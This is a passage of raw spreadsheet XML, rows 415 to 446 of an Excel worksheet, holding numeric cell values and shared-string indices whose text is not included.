        <v>18</v>
      </c>
      <c r="E415" s="14" t="s">
        <v>955</v>
      </c>
      <c r="F415" s="6">
        <v>1</v>
      </c>
      <c r="G415" s="6">
        <v>503</v>
      </c>
      <c r="H415" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I415" s="6">
        <v>594</v>
      </c>
      <c r="J415" s="6">
        <v>406</v>
      </c>
      <c r="K415" s="6">
        <v>0</v>
      </c>
      <c r="L415" s="6">
        <v>399</v>
      </c>
      <c r="M415" s="6">
        <v>35</v>
      </c>
      <c r="N415" s="11"/>
      <c r="O415" s="11"/>
      <c r="P415" s="11" t="s">
        <v>956</v>
      </c>
    </row>
    <row r="416" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A416" s="3">
        <v>414</v>
      </c>
      <c r="B416" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C416" s="11" t="s">
        <v>940</v>
      </c>
      <c r="D416" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E416" s="14" t="s">
        <v>957</v>
      </c>
      <c r="F416" s="6">
        <v>1</v>
      </c>
      <c r="G416" s="6">
        <v>503</v>
      </c>
      <c r="H416" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I416" s="6">
        <v>575</v>
      </c>
      <c r="J416" s="6">
        <v>411</v>
      </c>
      <c r="K416" s="6">
        <v>0</v>
      </c>
      <c r="L416" s="6">
        <v>399</v>
      </c>
      <c r="M416" s="6">
        <v>35</v>
      </c>
      <c r="N416" s="11"/>
      <c r="O416" s="11"/>
      <c r="P416" s="11" t="s">
        <v>958</v>
      </c>
    </row>
    <row r="417" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A417" s="3">
        <v>415</v>
      </c>
      <c r="B417" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C417" s="11" t="s">
        <v>940</v>
      </c>
      <c r="D417" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E417" s="14" t="s">
        <v>959</v>
      </c>
      <c r="F417" s="6">
        <v>1</v>
      </c>
      <c r="G417" s="6">
        <v>503</v>
      </c>
      <c r="H417" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I417" s="6">
        <v>568</v>
      </c>
      <c r="J417" s="6">
        <v>416</v>
      </c>
      <c r="K417" s="6">
        <v>0</v>
      </c>
      <c r="L417" s="6">
        <v>399</v>
      </c>
      <c r="M417" s="6">
        <v>35</v>
      </c>
      <c r="N417" s="11"/>
      <c r="O417" s="11"/>
      <c r="P417" s="11" t="s">
        <v>960</v>
      </c>
    </row>
    <row r="418" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A418" s="3">
        <v>416</v>
      </c>
      <c r="B418" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C418" s="11" t="s">
        <v>961</v>
      </c>
      <c r="D418" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E418" s="14" t="s">
        <v>962</v>
      </c>
      <c r="F418" s="6">
        <v>1</v>
      </c>
      <c r="G418" s="6">
        <v>503</v>
      </c>
      <c r="H418" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I418" s="6">
        <v>473</v>
      </c>
      <c r="J418" s="6">
        <v>421</v>
      </c>
      <c r="K418" s="6">
        <v>0</v>
      </c>
      <c r="L418" s="6">
        <v>399</v>
      </c>
      <c r="M418" s="6">
        <v>35</v>
      </c>
      <c r="N418" s="11"/>
      <c r="O418" s="11"/>
      <c r="P418" s="11" t="s">
        <v>963</v>
      </c>
    </row>
    <row r="419" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A419" s="3">
        <v>417</v>
      </c>
      <c r="B419" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C419" s="11" t="s">
        <v>961</v>
      </c>
      <c r="D419" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E419" s="14" t="s">
        <v>964</v>
      </c>
      <c r="F419" s="6">
        <v>1</v>
      </c>
      <c r="G419" s="6">
        <v>503</v>
      </c>
      <c r="H419" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I419" s="6">
        <v>416</v>
      </c>
      <c r="J419" s="6">
        <v>426</v>
      </c>
      <c r="K419" s="6">
        <v>0</v>
      </c>
      <c r="L419" s="6">
        <v>399</v>
      </c>
      <c r="M419" s="6">
        <v>35</v>
      </c>
      <c r="N419" s="11"/>
      <c r="O419" s="11"/>
      <c r="P419" s="11" t="s">
        <v>965</v>
      </c>
    </row>
    <row r="420" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A420" s="3">
        <v>418</v>
      </c>
      <c r="B420" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C420" s="11" t="s">
        <v>961</v>
      </c>
      <c r="D420" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E420" s="14" t="s">
        <v>966</v>
      </c>
      <c r="F420" s="6">
        <v>1</v>
      </c>
      <c r="G420" s="6">
        <v>503</v>
      </c>
      <c r="H420" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I420" s="6">
        <v>438</v>
      </c>
      <c r="J420" s="6">
        <v>431</v>
      </c>
      <c r="K420" s="6">
        <v>0</v>
      </c>
      <c r="L420" s="6">
        <v>399</v>
      </c>
      <c r="M420" s="6">
        <v>35</v>
      </c>
      <c r="N420" s="11"/>
      <c r="O420" s="11"/>
      <c r="P420" s="11" t="s">
        <v>967</v>
      </c>
    </row>
    <row r="421" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A421" s="3">
        <v>419</v>
      </c>
      <c r="B421" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C421" s="11" t="s">
        <v>961</v>
      </c>
      <c r="D421" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E421" s="14" t="s">
        <v>968</v>
      </c>
      <c r="F421" s="6">
        <v>1</v>
      </c>
      <c r="G421" s="6">
        <v>503</v>
      </c>
      <c r="H421" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I421" s="6">
        <v>437</v>
      </c>
      <c r="J421" s="6">
        <v>436</v>
      </c>
      <c r="K421" s="6">
        <v>0</v>
      </c>
      <c r="L421" s="6">
        <v>399</v>
      </c>
      <c r="M421" s="6">
        <v>35</v>
      </c>
      <c r="N421" s="11"/>
      <c r="O421" s="11"/>
      <c r="P421" s="11" t="s">
        <v>969</v>
      </c>
    </row>
    <row r="422" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A422" s="3">
        <v>420</v>
      </c>
      <c r="B422" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C422" s="11" t="s">
        <v>961</v>
      </c>
      <c r="D422" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E422" s="14" t="s">
        <v>970</v>
      </c>
      <c r="F422" s="6">
        <v>1</v>
      </c>
      <c r="G422" s="6">
        <v>503</v>
      </c>
      <c r="H422" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I422" s="6">
        <v>428</v>
      </c>
      <c r="J422" s="6">
        <v>441</v>
      </c>
      <c r="K422" s="6">
        <v>0</v>
      </c>
      <c r="L422" s="6">
        <v>399</v>
      </c>
      <c r="M422" s="6">
        <v>35</v>
      </c>
      <c r="N422" s="11"/>
      <c r="O422" s="11"/>
      <c r="P422" s="11" t="s">
        <v>971</v>
      </c>
    </row>
    <row r="423" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A423" s="3">
        <v>421</v>
      </c>
      <c r="B423" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C423" s="11" t="s">
        <v>961</v>
      </c>
      <c r="D423" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E423" s="14" t="s">
        <v>972</v>
      </c>
      <c r="F423" s="6">
        <v>1</v>
      </c>
      <c r="G423" s="6">
        <v>503</v>
      </c>
      <c r="H423" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I423" s="6">
        <v>428</v>
      </c>
      <c r="J423" s="6">
        <v>446</v>
      </c>
      <c r="K423" s="6">
        <v>0</v>
      </c>
      <c r="L423" s="6">
        <v>399</v>
      </c>
      <c r="M423" s="6">
        <v>35</v>
      </c>
      <c r="N423" s="11"/>
      <c r="O423" s="11"/>
      <c r="P423" s="11" t="s">
        <v>973</v>
      </c>
    </row>
    <row r="424" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A424" s="3">
        <v>422</v>
      </c>
      <c r="B424" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C424" s="11" t="s">
        <v>961</v>
      </c>
      <c r="D424" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E424" s="14" t="s">
        <v>974</v>
      </c>
      <c r="F424" s="6">
        <v>1</v>
      </c>
      <c r="G424" s="6">
        <v>503</v>
      </c>
      <c r="H424" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I424" s="6">
        <v>449</v>
      </c>
      <c r="J424" s="6">
        <v>451</v>
      </c>
      <c r="K424" s="6">
        <v>0</v>
      </c>
      <c r="L424" s="6">
        <v>399</v>
      </c>
      <c r="M424" s="6">
        <v>35</v>
      </c>
      <c r="N424" s="11"/>
      <c r="O424" s="11"/>
      <c r="P424" s="11" t="s">
        <v>975</v>
      </c>
    </row>
    <row r="425" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A425" s="3">
        <v>423</v>
      </c>
      <c r="B425" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C425" s="11" t="s">
        <v>961</v>
      </c>
      <c r="D425" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E425" s="14" t="s">
        <v>976</v>
      </c>
      <c r="F425" s="6">
        <v>1</v>
      </c>
      <c r="G425" s="6">
        <v>503</v>
      </c>
      <c r="H425" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I425" s="6">
        <v>465</v>
      </c>
      <c r="J425" s="6">
        <v>456</v>
      </c>
      <c r="K425" s="6">
        <v>0</v>
      </c>
      <c r="L425" s="6">
        <v>399</v>
      </c>
      <c r="M425" s="6">
        <v>35</v>
      </c>
      <c r="N425" s="11"/>
      <c r="O425" s="11"/>
      <c r="P425" s="11" t="s">
        <v>977</v>
      </c>
    </row>
    <row r="426" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A426" s="3">
        <v>424</v>
      </c>
      <c r="B426" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C426" s="11" t="s">
        <v>961</v>
      </c>
      <c r="D426" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E426" s="14" t="s">
        <v>978</v>
      </c>
      <c r="F426" s="6">
        <v>1</v>
      </c>
      <c r="G426" s="6">
        <v>503</v>
      </c>
      <c r="H426" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I426" s="6">
        <v>472</v>
      </c>
      <c r="J426" s="6">
        <v>461</v>
      </c>
      <c r="K426" s="6">
        <v>0</v>
      </c>
      <c r="L426" s="6">
        <v>399</v>
      </c>
      <c r="M426" s="6">
        <v>35</v>
      </c>
      <c r="N426" s="11"/>
      <c r="O426" s="11"/>
      <c r="P426" s="11" t="s">
        <v>979</v>
      </c>
    </row>
    <row r="427" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A427" s="3">
        <v>425</v>
      </c>
      <c r="B427" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C427" s="11" t="s">
        <v>961</v>
      </c>
      <c r="D427" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E427" s="14" t="s">
        <v>980</v>
      </c>
      <c r="F427" s="6">
        <v>1</v>
      </c>
      <c r="G427" s="6">
        <v>503</v>
      </c>
      <c r="H427" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I427" s="6">
        <v>555</v>
      </c>
      <c r="J427" s="6">
        <v>466</v>
      </c>
      <c r="K427" s="6">
        <v>0</v>
      </c>
      <c r="L427" s="6">
        <v>399</v>
      </c>
      <c r="M427" s="6">
        <v>35</v>
      </c>
      <c r="N427" s="11"/>
      <c r="O427" s="11"/>
      <c r="P427" s="11" t="s">
        <v>981</v>
      </c>
    </row>
    <row r="428" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A428" s="3">
        <v>426</v>
      </c>
      <c r="B428" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C428" s="11" t="s">
        <v>982</v>
      </c>
      <c r="D428" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E428" s="14" t="s">
        <v>983</v>
      </c>
      <c r="F428" s="6">
        <v>1</v>
      </c>
      <c r="G428" s="6">
        <v>503</v>
      </c>
      <c r="H428" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I428" s="6">
        <v>578</v>
      </c>
      <c r="J428" s="6">
        <v>471</v>
      </c>
      <c r="K428" s="6">
        <v>0</v>
      </c>
      <c r="L428" s="6">
        <v>399</v>
      </c>
      <c r="M428" s="6">
        <v>35</v>
      </c>
      <c r="N428" s="11"/>
      <c r="O428" s="11"/>
      <c r="P428" s="11" t="s">
        <v>984</v>
      </c>
    </row>
    <row r="429" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A429" s="3">
        <v>427</v>
      </c>
      <c r="B429" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C429" s="11" t="s">
        <v>982</v>
      </c>
      <c r="D429" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E429" s="14" t="s">
        <v>985</v>
      </c>
      <c r="F429" s="6">
        <v>1</v>
      </c>
      <c r="G429" s="6">
        <v>503</v>
      </c>
      <c r="H429" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I429" s="6">
        <v>659</v>
      </c>
      <c r="J429" s="6">
        <v>476</v>
      </c>
      <c r="K429" s="6">
        <v>0</v>
      </c>
      <c r="L429" s="6">
        <v>399</v>
      </c>
      <c r="M429" s="6">
        <v>35</v>
      </c>
      <c r="N429" s="11"/>
      <c r="O429" s="11"/>
      <c r="P429" s="11" t="s">
        <v>986</v>
      </c>
    </row>
    <row r="430" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A430" s="3">
        <v>428</v>
      </c>
      <c r="B430" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C430" s="11" t="s">
        <v>982</v>
      </c>
      <c r="D430" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E430" s="14" t="s">
        <v>987</v>
      </c>
      <c r="F430" s="6">
        <v>1</v>
      </c>
      <c r="G430" s="6">
        <v>503</v>
      </c>
      <c r="H430" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I430" s="6">
        <v>663</v>
      </c>
      <c r="J430" s="6">
        <v>481</v>
      </c>
      <c r="K430" s="6">
        <v>0</v>
      </c>
      <c r="L430" s="6">
        <v>399</v>
      </c>
      <c r="M430" s="6">
        <v>35</v>
      </c>
      <c r="N430" s="11"/>
      <c r="O430" s="11"/>
      <c r="P430" s="11" t="s">
        <v>988</v>
      </c>
    </row>
    <row r="431" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A431" s="3">
        <v>429</v>
      </c>
      <c r="B431" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C431" s="11" t="s">
        <v>982</v>
      </c>
      <c r="D431" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E431" s="14" t="s">
        <v>989</v>
      </c>
      <c r="F431" s="6">
        <v>1</v>
      </c>
      <c r="G431" s="6">
        <v>503</v>
      </c>
      <c r="H431" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I431" s="6">
        <v>649</v>
      </c>
      <c r="J431" s="6">
        <v>486</v>
      </c>
      <c r="K431" s="6">
        <v>0</v>
      </c>
      <c r="L431" s="6">
        <v>399</v>
      </c>
      <c r="M431" s="6">
        <v>35</v>
      </c>
      <c r="N431" s="11"/>
      <c r="O431" s="11"/>
      <c r="P431" s="11" t="s">
        <v>990</v>
      </c>
    </row>
    <row r="432" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A432" s="3">
        <v>430</v>
      </c>
      <c r="B432" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C432" s="11" t="s">
        <v>982</v>
      </c>
      <c r="D432" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E432" s="14" t="s">
        <v>991</v>
      </c>
      <c r="F432" s="6">
        <v>1</v>
      </c>
      <c r="G432" s="6">
        <v>503</v>
      </c>
      <c r="H432" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I432" s="6">
        <v>553</v>
      </c>
      <c r="J432" s="6">
        <v>491</v>
      </c>
      <c r="K432" s="6">
        <v>0</v>
      </c>
      <c r="L432" s="6">
        <v>399</v>
      </c>
      <c r="M432" s="6">
        <v>35</v>
      </c>
      <c r="N432" s="11"/>
      <c r="O432" s="11"/>
      <c r="P432" s="11" t="s">
        <v>992</v>
      </c>
    </row>
    <row r="433" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A433" s="3">
        <v>431</v>
      </c>
      <c r="B433" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C433" s="11" t="s">
        <v>982</v>
      </c>
      <c r="D433" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E433" s="14" t="s">
        <v>993</v>
      </c>
      <c r="F433" s="6">
        <v>1</v>
      </c>
      <c r="G433" s="6">
        <v>503</v>
      </c>
      <c r="H433" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I433" s="6">
        <v>540</v>
      </c>
      <c r="J433" s="6">
        <v>496</v>
      </c>
      <c r="K433" s="6">
        <v>0</v>
      </c>
      <c r="L433" s="6">
        <v>399</v>
      </c>
      <c r="M433" s="6">
        <v>35</v>
      </c>
      <c r="N433" s="11"/>
      <c r="O433" s="11"/>
      <c r="P433" s="11" t="s">
        <v>994</v>
      </c>
    </row>
    <row r="434" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A434" s="3">
        <v>432</v>
      </c>
      <c r="B434" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C434" s="11" t="s">
        <v>982</v>
      </c>
      <c r="D434" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E434" s="14" t="s">
        <v>995</v>
      </c>
      <c r="F434" s="6">
        <v>1</v>
      </c>
      <c r="G434" s="6">
        <v>503</v>
      </c>
      <c r="H434" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I434" s="6">
        <v>485</v>
      </c>
      <c r="J434" s="6">
        <v>501</v>
      </c>
      <c r="K434" s="6">
        <v>0</v>
      </c>
      <c r="L434" s="6">
        <v>399</v>
      </c>
      <c r="M434" s="6">
        <v>35</v>
      </c>
      <c r="N434" s="11"/>
      <c r="O434" s="11"/>
      <c r="P434" s="11" t="s">
        <v>996</v>
      </c>
    </row>
    <row r="435" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A435" s="3">
        <v>433</v>
      </c>
      <c r="B435" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C435" s="11" t="s">
        <v>982</v>
      </c>
      <c r="D435" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E435" s="14" t="s">
        <v>997</v>
      </c>
      <c r="F435" s="6">
        <v>1</v>
      </c>
      <c r="G435" s="6">
        <v>503</v>
      </c>
      <c r="H435" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I435" s="6">
        <v>476</v>
      </c>
      <c r="J435" s="6">
        <v>506</v>
      </c>
      <c r="K435" s="6">
        <v>0</v>
      </c>
      <c r="L435" s="6">
        <v>399</v>
      </c>
      <c r="M435" s="6">
        <v>35</v>
      </c>
      <c r="N435" s="11"/>
      <c r="O435" s="11"/>
      <c r="P435" s="11" t="s">
        <v>998</v>
      </c>
    </row>
    <row r="436" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A436" s="3">
        <v>434</v>
      </c>
      <c r="B436" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C436" s="11" t="s">
        <v>999</v>
      </c>
      <c r="D436" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E436" s="14" t="s">
        <v>1000</v>
      </c>
      <c r="F436" s="6">
        <v>1</v>
      </c>
      <c r="G436" s="6">
        <v>503</v>
      </c>
      <c r="H436" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I436" s="6">
        <v>488</v>
      </c>
      <c r="J436" s="6">
        <v>511</v>
      </c>
      <c r="K436" s="6">
        <v>0</v>
      </c>
      <c r="L436" s="6">
        <v>399</v>
      </c>
      <c r="M436" s="6">
        <v>35</v>
      </c>
      <c r="N436" s="11"/>
      <c r="O436" s="11"/>
      <c r="P436" s="11" t="s">
        <v>1001</v>
      </c>
    </row>
    <row r="437" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A437" s="3">
        <v>435</v>
      </c>
      <c r="B437" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C437" s="11" t="s">
        <v>999</v>
      </c>
      <c r="D437" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E437" s="14" t="s">
        <v>1002</v>
      </c>
      <c r="F437" s="6">
        <v>1</v>
      </c>
      <c r="G437" s="6">
        <v>503</v>
      </c>
      <c r="H437" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I437" s="6">
        <v>481</v>
      </c>
      <c r="J437" s="6">
        <v>516</v>
      </c>
      <c r="K437" s="6">
        <v>0</v>
      </c>
      <c r="L437" s="6">
        <v>399</v>
      </c>
      <c r="M437" s="6">
        <v>35</v>
      </c>
      <c r="N437" s="11"/>
      <c r="O437" s="11"/>
      <c r="P437" s="11" t="s">
        <v>1003</v>
      </c>
    </row>
    <row r="438" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A438" s="3">
        <v>436</v>
      </c>
      <c r="B438" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C438" s="11" t="s">
        <v>999</v>
      </c>
      <c r="D438" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E438" s="14" t="s">
        <v>1004</v>
      </c>
      <c r="F438" s="6">
        <v>1</v>
      </c>
      <c r="G438" s="6">
        <v>503</v>
      </c>
      <c r="H438" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I438" s="6">
        <v>473</v>
      </c>
      <c r="J438" s="6">
        <v>521</v>
      </c>
      <c r="K438" s="6">
        <v>0</v>
      </c>
      <c r="L438" s="6">
        <v>399</v>
      </c>
      <c r="M438" s="6">
        <v>35</v>
      </c>
      <c r="N438" s="11"/>
      <c r="O438" s="11"/>
      <c r="P438" s="11" t="s">
        <v>1005</v>
      </c>
    </row>
    <row r="439" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A439" s="3">
        <v>437</v>
      </c>
      <c r="B439" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C439" s="11" t="s">
        <v>999</v>
      </c>
      <c r="D439" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E439" s="14" t="s">
        <v>1006</v>
      </c>
      <c r="F439" s="6">
        <v>1</v>
      </c>
      <c r="G439" s="6">
        <v>503</v>
      </c>
      <c r="H439" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I439" s="6">
        <v>430</v>
      </c>
      <c r="J439" s="6">
        <v>526</v>
      </c>
      <c r="K439" s="6">
        <v>0</v>
      </c>
      <c r="L439" s="6">
        <v>399</v>
      </c>
      <c r="M439" s="6">
        <v>35</v>
      </c>
      <c r="N439" s="11"/>
      <c r="O439" s="11"/>
      <c r="P439" s="11" t="s">
        <v>1007</v>
      </c>
    </row>
    <row r="440" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A440" s="3">
        <v>438</v>
      </c>
      <c r="B440" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C440" s="11" t="s">
        <v>999</v>
      </c>
      <c r="D440" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E440" s="14" t="s">
        <v>1008</v>
      </c>
      <c r="F440" s="6">
        <v>1</v>
      </c>
      <c r="G440" s="6">
        <v>503</v>
      </c>
      <c r="H440" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I440" s="6">
        <v>401</v>
      </c>
      <c r="J440" s="6">
        <v>531</v>
      </c>
      <c r="K440" s="6">
        <v>0</v>
      </c>
      <c r="L440" s="6">
        <v>399</v>
      </c>
      <c r="M440" s="6">
        <v>35</v>
      </c>
      <c r="N440" s="11"/>
      <c r="O440" s="11"/>
      <c r="P440" s="11" t="s">
        <v>1009</v>
      </c>
    </row>
    <row r="441" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A441" s="3">
        <v>439</v>
      </c>
      <c r="B441" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C441" s="11" t="s">
        <v>999</v>
      </c>
      <c r="D441" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E441" s="14" t="s">
        <v>1010</v>
      </c>
      <c r="F441" s="6">
        <v>1</v>
      </c>
      <c r="G441" s="6">
        <v>404</v>
      </c>
      <c r="H441" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I441" s="6">
        <v>416</v>
      </c>
      <c r="J441" s="6">
        <v>357</v>
      </c>
      <c r="K441" s="6">
        <v>0</v>
      </c>
      <c r="L441" s="6">
        <v>331</v>
      </c>
      <c r="M441" s="6">
        <v>69134</v>
      </c>
      <c r="N441" s="11"/>
      <c r="O441" s="11"/>
      <c r="P441" s="11" t="s">
        <v>1011</v>
      </c>
    </row>
    <row r="442" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A442" s="3">
        <v>440</v>
      </c>
      <c r="B442" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C442" s="11" t="s">
        <v>999</v>
      </c>
      <c r="D442" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E442" s="14" t="s">
        <v>1012</v>
      </c>
      <c r="F442" s="6">
        <v>1</v>
      </c>
      <c r="G442" s="6">
        <v>404</v>
      </c>
      <c r="H442" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I442" s="6">
        <v>456</v>
      </c>
      <c r="J442" s="6">
        <v>384</v>
      </c>
      <c r="K442" s="6">
        <v>0</v>
      </c>
      <c r="L442" s="6">
        <v>331</v>
      </c>
      <c r="M442" s="6">
        <v>69134</v>
      </c>
      <c r="N442" s="11"/>
      <c r="O442" s="11"/>
      <c r="P442" s="11" t="s">
        <v>1013</v>
      </c>
    </row>
    <row r="443" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A443" s="3">
        <v>441</v>
      </c>
      <c r="B443" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C443" s="11" t="s">
        <v>999</v>
      </c>
      <c r="D443" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E443" s="14" t="s">
        <v>1014</v>
      </c>
      <c r="F443" s="6">
        <v>1</v>
      </c>
      <c r="G443" s="6">
        <v>404</v>
      </c>
      <c r="H443" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I443" s="6">
        <v>468</v>
      </c>
      <c r="J443" s="6">
        <v>393</v>
      </c>
      <c r="K443" s="6">
        <v>0</v>
      </c>
      <c r="L443" s="6">
        <v>331</v>
      </c>
      <c r="M443" s="6">
        <v>69134</v>
      </c>
      <c r="N443" s="11"/>
      <c r="O443" s="11"/>
      <c r="P443" s="11" t="s">
        <v>1015</v>
      </c>
    </row>
    <row r="444" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A444" s="3">
        <v>442</v>
      </c>
      <c r="B444" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C444" s="11" t="s">
        <v>999</v>
      </c>
      <c r="D444" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E444" s="14" t="s">
        <v>1016</v>
      </c>
      <c r="F444" s="6">
        <v>1</v>
      </c>
      <c r="G444" s="6">
        <v>404</v>
      </c>
      <c r="H444" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I444" s="6">
        <v>480</v>
      </c>
      <c r="J444" s="6">
        <v>402</v>
      </c>
      <c r="K444" s="6">
        <v>0</v>
      </c>
      <c r="L444" s="6">
        <v>331</v>
      </c>
      <c r="M444" s="6">
        <v>69134</v>
      </c>
      <c r="N444" s="11"/>
      <c r="O444" s="11"/>
      <c r="P444" s="11" t="s">
        <v>1017</v>
      </c>
    </row>
    <row r="445" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A445" s="3">
        <v>443</v>
      </c>
      <c r="B445" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C445" s="11" t="s">
        <v>999</v>
      </c>
      <c r="D445" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E445" s="14" t="s">
        <v>1018</v>
      </c>
      <c r="F445" s="6">
        <v>1</v>
      </c>
      <c r="G445" s="6">
        <v>404</v>
      </c>
      <c r="H445" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I445" s="6">
        <v>504</v>
      </c>
      <c r="J445" s="6">
        <v>411</v>
      </c>
      <c r="K445" s="6">
        <v>0</v>
      </c>
      <c r="L445" s="6">
        <v>331</v>
      </c>
      <c r="M445" s="6">
        <v>69134</v>
      </c>
      <c r="N445" s="11"/>
      <c r="O445" s="11"/>
      <c r="P445" s="11" t="s">
        <v>1019</v>
      </c>
    </row>
    <row r="446" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A446" s="3">
        <v>444</v>
      </c>
      <c r="B446" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C446" s="11" t="s">
        <v>999</v>
      </c>
      <c r="D446" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E446" s="14" t="s">
        <v>1020</v>
      </c>
      <c r="F446" s="6">
